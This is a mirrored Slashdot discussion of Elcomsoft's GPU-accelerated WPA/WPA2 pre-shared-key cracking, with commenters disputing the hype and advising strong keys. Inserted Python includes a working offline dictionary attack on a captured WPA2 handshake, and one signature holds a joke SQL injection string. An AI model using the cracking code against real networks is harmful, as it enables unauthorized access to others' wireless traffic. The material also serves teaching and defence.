Slashdot Mirror


Elcomsoft Claims WPA/WPA2 Cracking Breakthrough

secmartin writes "Russian security firm Elcomsoft has released software that uses Nvidia GPUs to speed up the cracking of WPA and WPA2 keys by a factor of 100. Since the software allows them to network thousands of PCs, this announcement effectively signals the death of wireless networking in business networks; any network handling sensitive data should start using VPN encryption on machines connecting over Wi-Fi networks, or stop using these networks altogether."

21 of 349 comments

  1. Looks Like I'm Safe by linuxmeepster · · Score: 5, Interesting

    "Brute Force Attack will take up to 128299838271 years" at 500,000 passwords a second. ElcomSoft is claiming a 20x improvement in speed, but that won't make a dent into an exponential-sized problem. See http://lastbit.com/pswcalc.asp for calculation.

    1. Re:Looks Like I'm Safe by Anonymous Coward · · Score: 5, Informative

      Uh, where are you getting that number? (26*2+1)^10 works out to 1.7488747 * 10^17. Wouldn't it be more like ((26*2)+10)^10, assuming no spaces?

    2. Re:Looks Like I'm Safe by Sasayaki · · Score: 5, Funny

      "Brute Force Attack will take up to 128299838271 years"

      Look, I understand that's enough security for you mortals, but I plan to live forever. I don't want someone getting my data just after my 128,299,838,295th birthday!

      --
      Check out my sci-fi book "Lacuna" at http://goo.gl/MVxX8
    3. Re:Looks Like I'm Safe by ksd1337 · · Score: 5, Funny

      I don't want someone getting my data just after my 128,299,838,295th birthday!

      Tell us if they release Duke Nukem Forever by your 128 billionth birthday.

    4. Re:Looks Like I'm Safe by tftp · · Score: 5, Funny

      I recently moved up 23 chars, but it won't calculate that for me.

      Do not worry, the keylogger inside of your keyboard has plenty of memory.

  2. Does this surprise anyone? by Mad+Merlin · · Score: 5, Insightful

    This doesn't surprise me. Anyone who wasn't already assuming that anything you sent via wireless was already in the hands of your enemies (unencrypted) is a bit naive.

    1. Re:Does this surprise anyone? by Anonymous Coward · · Score: 5, Insightful

      I don't care how you're accessing the net, if it's important encrypt it.

  3. Rotate your keys by Legion_SB · · Score: 5, Insightful

    With good keys, even a 100x increase in cracking speed is still not fast

    Don't use a little 8-character passphrase. Use long keys, and don't just leave them in place forever. Change them periodically.

    --
    'a';DROP TABLE users; SELECT * FROM DATA WHERE name LIKE '%'... if you're reading this, it didn't work.
  4. Newsflash: Most "Business Networks" Aren't Secure by Llywelyn · · Score: 5, Insightful

    Most businesses I've seen have had easily guessable passwords, used open relays, or WEP encryption. Many don't change their keys even after firing someone. Saying that this is a "death knell" is serious hyperbole since, for many companies, convenience trumps hardened security.

    That said, the biggest risk is still always going to be insiders and former insiders who won't need to crack into the wireless network: they will already know how to get access.

    --
    Integrate Keynote and LaTeX
  5. Why does wireless security suck so bad? by mcrbids · · Score: 5, Insightful

    Seriously. We've had a number of standards with names like "Wired Equivalency Protocol" and "Wifi Protected Access" and yet they seem to be falling, one-by-one, to relatively trivial attacks. I'm not saying that WPA is as bad as WEP, but how come they can't copy/paste something as good as good old-fashioned SSL?

    SSL has withstood the tests of time, over, and over, and over, and over again. SSL is the gold standard for encryption. It's used on every HTTPS website, it's used for SSH, it's used as part of kerberos, IMAPS, POPS, TLS, and just about every other good-quality security tool.

    So why are wireless chipset manufacturers trying to re-invent the wheel, when it's widely known that these kinds of wheels are FRIGGEN HARD to re-invent well?

    Start with normal, unencrypted wireless. Getting that to work was solved long ago. Embed an SSL engine into your wireless device, with a randomly generated private key. Provide a means to access the public key, and copy/paste that key into your high security wireless driver. If you want to be paranoid, your local driver generates a private/public key pair as well, and that can be copy/pasted to your wireless device.

    Done! Now you *KNOW* that if you are accessing the Internet through the driver, you are doing so through the correct wireless hotspot. Who cares about wireless MITM attacks at that point? The SSL protocol *ASSUMES* that there are MITM attempts, and foils them quite effectively, over the equally open and unsecured Internet.

    Seriously, folks. This is a problem that was solved over a decade ago. Why are we doing this again?

    --
    I have no problem with your religion until you decide it's reason to deprive others of the truth.
    1. Re:Why does wireless security suck so bad? by swillden · · Score: 5, Informative

      Seriously. We've had a number of standards with names like "Wired Equivalency Protocol" and "Wifi Protected Access" and yet they seem to be falling, one-by-one, to relatively trivial attacks.

      "Seem" is the key word in this paragraph.

      The claimed attack is nothing more than a brute force search on WPA/WPA2 pre-shared keys, a search that will fail if the keys are well-chosen. It has no effect whatsoever on WPA or WPA2 when used with any of the EAP authentication modes. But PSK requires the network admin to choose a key, and the key is typically chosen by typing in a passphrase. If that passphrase is weak, then given enough computation power an attacker can guess it. Big surprise.

      WPA and WPA2 ARE just as solid as SSL. The only difference is that everyone knows that if you're doing SSL you should use a good random number generator to help generate your key pair and to generate the session keys.

      --
      Note to ACs: I usually delete AC replies without reading them. If you want to talk to me, log in.
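The search swillden describes above (guess a passphrase, derive the key, check it against the handshake) is easy to make concrete. The block below is an added example, not code from the original page or from Elcomsoft: it derives the PMK the way 802.11i specifies (PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 iterations, 256-bit output), expands it to the PTK with the handshake nonces and MAC addresses, and tests each candidate against the MIC of a captured EAPOL-Key frame. The MAC addresses, nonces and the message-2 frame are constructed here and signed with the correct passphrase so the attack has something to verify; the only real value is the PBKDF2 test vector ("password" with SSID "IEEE") from 802.11i Annex H. Every candidate costs a full PBKDF2 (8192 HMAC-SHA1 calls for a 256-bit output) plus a few HMACs, which is why the claimed speedup comes from running candidates in parallel on GPUs and not from any shortcut, and why it changes nothing for a well-chosen key.

```python
"""WPA/WPA2-PSK: how the pre-shared key is derived, and the dictionary
attack that a captured 4-way handshake permits.  Added example; the MAC
addresses, nonces and EAPOL frame below are constructed for the demo."""
import hashlib
import hmac

MIC_OFFSET = 81   # offset of the 16-byte MIC field inside an EAPOL-Key frame


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    This is the per-candidate cost an attacker pays; the SSID is public."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from 802.11i: expands the PMK with both MAC addresses and both
    nonces (all sent in the clear).  The first 16 bytes are the KCK, which
    keys the handshake MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 160 bits >= 512 bits
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1-128 over the frame with
    the MIC field zeroed.  WPA/TKIP (version 1) uses HMAC-MD5 instead."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes) -> bytes:
    """Constructed message 2 of the 4-way handshake (supplicant -> AP) with an
    empty MIC field; only the fields the MIC check needs are meaningful."""
    body = (
        b"\x02"                            # descriptor type: RSN
        + (0x010A).to_bytes(2, "big")      # key info: version 2 (HMAC-SHA1), pairwise, MIC set
        + (16).to_bytes(2, "big")          # key length
        + (1).to_bytes(8, "big")           # replay counter
        + snonce                           # 32-byte SNonce
        + bytes(16) + bytes(8) + bytes(8)  # key IV, RSC, key ID (unused in msg 2)
        + bytes(16)                        # MIC, filled in by sign_msg2
        + bytes(2)                         # key data length: 0
    )
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v2, type EAPOL-Key


def sign_msg2(passphrase, ssid, aa, spa, anonce, snonce) -> bytes:
    """What a legitimate supplicant does: derive the KCK and fill in the MIC."""
    frame = build_msg2(snonce)
    kck = ptk_from_pmk(wpa_pmk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def crack_psk(ssid, aa, spa, anonce, snonce, frame, wordlist):
    """Offline attack on a captured handshake: every input except the passphrase
    was observed on the air, so each guess costs one PBKDF2 (8192 HMAC-SHA1)
    plus five HMACs for the PTK and the MIC."""
    observed = frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = ptk_from_pmk(wpa_pmk(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, frame), observed):
            return candidate
    return None


# Constructed handshake parameters (not from any real capture).
AA = bytes.fromhex("001122334455")      # AP MAC address
SPA = bytes.fromhex("66778899aabb")     # station MAC address
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))

if __name__ == "__main__":
    captured = sign_msg2("password", "IEEE", AA, SPA, ANONCE, SNONCE)
    wordlist = ["letmein", "12345678", "qwertyuiop", "password"]
    print("recovered:", crack_psk("IEEE", AA, SPA, ANONCE, SNONCE, captured, wordlist))
```

The check is exact rather than probabilistic: a wrong passphrase yields a different PMK, a different KCK and a MIC that does not match, so a wordlist that does not contain the passphrase returns nothing no matter how fast it is run. Note that none of this applies to WPA-Enterprise (EAP) networks, where the PMK comes from the authentication server and there is no passphrase to guess.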
    2. Re:Why does wireless security suck so bad? by databeast · · Score: 5, Informative

      Better yet, use 802.1x (WPA + RADIUS) which completely avoids all the key-exchange weaknesses of WEP and WPA.

    3. Re:Why does wireless security suck so bad? by eric2hill · · Score: 5, Funny

      Almost, but your key may not be as truly random as you might think. Post your key here so we can verify it's really secure.

      --
      LOAD "SIG",8,1
      LOADING...
      READY.
      RUN
  6. F@H by Kooty-Sentinel · · Score: 5, Interesting

    I wonder how long it would take the entire Folding@Home grid to crack a single WPA/WPA2 key. Can anyone do the math?

    --
    Your evaluation period for Productivity 1.0 has ended. Please purchase more coffee to continue using this product.
  7. Oh, pull the other leg... by subreality · · Score: 5, Interesting

    This is seriously overhyped. #1:

    This announcement effectively signals the death of wireless networking in business networks;

    Bullshit. The underlying encryption is based on AES*. AES is not a toy algorithm, and is designed to defend against specialized cracking hardware, and all other known attacks. It is *plenty* strong enough to hold up to a 100X increase in cracking speed, as long as you use good keys, which hopefully you are in a business environment.

    I'm willing to believe that a key handling vulnerability might exist in WPA, or a flaw in AES, but the notion that brute force has brought about the death of WPA in business networks is just absurd. At best, this is a reminder to use good keys.

    any network handling sensitive data should start using VPN encryption on machines connecting over Wi-Fi networks, or stop using these networks altogether.

    Do you think your VPN software has a better underlying algorithm than AES?

    * Unless you're using TKIP, which is a toy algorithm, which exists for backwards hardware compatibility, and in my experience isn't used by anyone who cares about security... But even there, the potential attack vectors are through algorithm weaknesses, not brute forcing the keys.

  8. Summary is quite silly! by Qwavel · · Score: 5, Informative

    Businesses that are serious about their security use one of the many types of WPA-Enterprise. The method described in this article only applies to WPA-Personal which is targeted at home users.

    Those businesses that do use WPA-Personal can simply institute a policy that requires better passwords to secure them against this exploit.

    Some businesses will continue to use WPA-Personal with poor passwords, and that's fine, but those businesses are probably not too worried about security and have many other bigger vulnerabilities.

    So, the claim that "this announcement effectively signals the death of wireless networking in business networks" is ridiculous.

  9. Re:You can get hard passwords by mlts · · Score: 5, Informative

    I personally recommend KeePass for password generation. It can generate 63 char passwords for WPA/WPA2 keys with cryptographically random unpredictability as it uses keyboard/mouse movements as part of seeding. Because it's done on the local machine, there is no chance of the password being leaked, as compared to over the web. With a 63 character password, that is far more entropy than the 128- or 256-bit keys used for AES, so for someone to guess a password of that length, they either have to be able to brute force AES at full strength, or find a weakness in the algorithm's implementation.

    I generate a KeePass password, save it to a USB flash drive, then paste it into my router's config. I then take the USB flash drive to the physical machines and do a copy and paste of the 63 char key into their network preferences. This is a lot easier than typing it. Should I lose the key... not hard to fix -- generate another one and rekey the 3-4 machines on my network. Because the WPA/WPA2 key is easily resettable with physical access to the machines, there is no reason to go less than the maximum character length, and it doesn't matter if the password gets forgotten, as long as you remember your router and machine's access passwords. (This for a home network. Businesses should use a RADIUS server where all the machines are not reliant on a single shared encryption key.)

    If you have to use fewer characters, I'd say never use fewer than 20 characters, but even that is cutting it thin, factoring in Moore's law, botnets, and usage of GPUs for additional number crunching.
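Two comments in this thread do arithmetic on the passphrase: linuxmeepster's calculator estimate at 500,000 guesses a second, and mlts's 63-character keys above. The block below is an added example, not code from the page, that puts that arithmetic in one place: it generates a WPA-valid passphrase from the OS CSPRNG, checks the 802.11i constraints (8 to 63 printable ASCII characters), estimates entropy the way a per-character-class calculator does, and caps the estimate at 256 bits, because the passphrase is stretched into a 256-bit PMK and entropy beyond that cannot be exploited by guessing the passphrase. The guess rates are parameters taken from the thread, not measurements.

```python
"""Passphrase strength arithmetic for WPA/WPA2-PSK.  Added example."""
import math
import secrets
import string

PSK_CHARSET = "".join(chr(c) for c in range(32, 127))  # printable ASCII, 95 symbols
PMK_BITS = 256  # PBKDF2 output is 256 bits; more passphrase entropy than this is wasted
SYMBOLS = "".join(c for c in PSK_CHARSET if c not in string.ascii_letters + string.digits)
SECONDS_PER_YEAR = 365.25 * 24 * 3600


def is_valid_psk(passphrase: str) -> bool:
    """802.11i passphrase rule: 8..63 characters, each printable ASCII (32..126)."""
    return 8 <= len(passphrase) <= 63 and all(c in PSK_CHARSET for c in passphrase)


def generate_psk(length: int = 63) -> str:
    """Uniform random passphrase from the OS CSPRNG (secrets), as an alternative
    to pasting one out of a password manager."""
    if not 8 <= length <= 63:
        raise ValueError("WPA passphrases are 8 to 63 characters")
    return "".join(secrets.choice(PSK_CHARSET) for _ in range(length))


def charset_size(passphrase: str) -> int:
    """Alphabet size the way lastbit-style calculators count it: the union of
    the character classes that actually appear in the passphrase."""
    size = 0
    for cls, n in ((string.ascii_lowercase, 26), (string.ascii_uppercase, 26),
                   (string.digits, 10), (SYMBOLS, len(SYMBOLS))):
        if any(c in cls for c in passphrase):
            size += n
    return size


def entropy_bits(passphrase: str) -> float:
    """Upper bound on guessing entropy: every position uniform over the observed
    alphabet, capped at the size of the key the passphrase is stretched into.
    A dictionary word scores far higher here than it is really worth."""
    n = charset_size(passphrase)
    if n == 0:
        return 0.0
    return min(len(passphrase) * math.log2(n), PMK_BITS)


def years_to_exhaust(bits: float, guesses_per_second: float) -> float:
    """Time to try the whole space at a given rate (expected time is half of it)."""
    return 2.0 ** bits / guesses_per_second / SECONDS_PER_YEAR


if __name__ == "__main__":
    base_rate = 500_000.0  # the rate linuxmeepster's calculator assumed
    for label, pw in (("8 lowercase", "abcdefgh"), ("8 mixed", "Ab3$efGh"),
                      ("20 random", generate_psk(20)), ("63 random", generate_psk(63))):
        bits = entropy_bits(pw)
        print(f"{label:12} {bits:6.1f} bits  "
              f"{years_to_exhaust(bits, base_rate):.3g} y at {base_rate:.0e}/s, "
              f"{years_to_exhaust(bits, base_rate * 100):.3g} y with the claimed 100x")
```

The cap is the point mlts is making: a 63-character random key already exceeds 256 bits of entropy, so the only way past it is the PMK itself, not the passphrase. The other thing the numbers show is that a 100x speedup moves the exponent by under seven bits, which is less than one extra random character from a 95-symbol alphabet.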

  10. We're okay by Anonymous Coward · · Score: 5, Funny

    Hah! My company is okay- we're only using MAC filtering for our security, none of this insecure WEP/WPA crap.

  11. ..since as we know, ... by Marcika · · Score: 5, Funny

    ... Most people use passwords. Some people use passphrases. Bruce Schneier uses an epic passpoem, detailing the life and works of seven mythical Norse heroes.

  12. Bullshit, FUD and the worst summary I've ever read by Anonymous Coward · · Score: 5, Insightful

    Using GPUs to crack is not "new", it's a well known technique. Furthermore, an increase of a factor of 100 is insignificant relative to the number of years it would take to crack a key, hence the crypto is not weakened, dispelling their whole "death of wireless networking" doom-monger bullshit. The only thing this actually does is speed up already feasible attacks against bad passphrases, nothing new, and certainly not a "breakthrough".

  13. Re:You can get hard passwords by Hork_Monkey · · Score: 5, Informative

    If you're setting up a 200 device wireless network with WPA PSK, you're doing it wrong.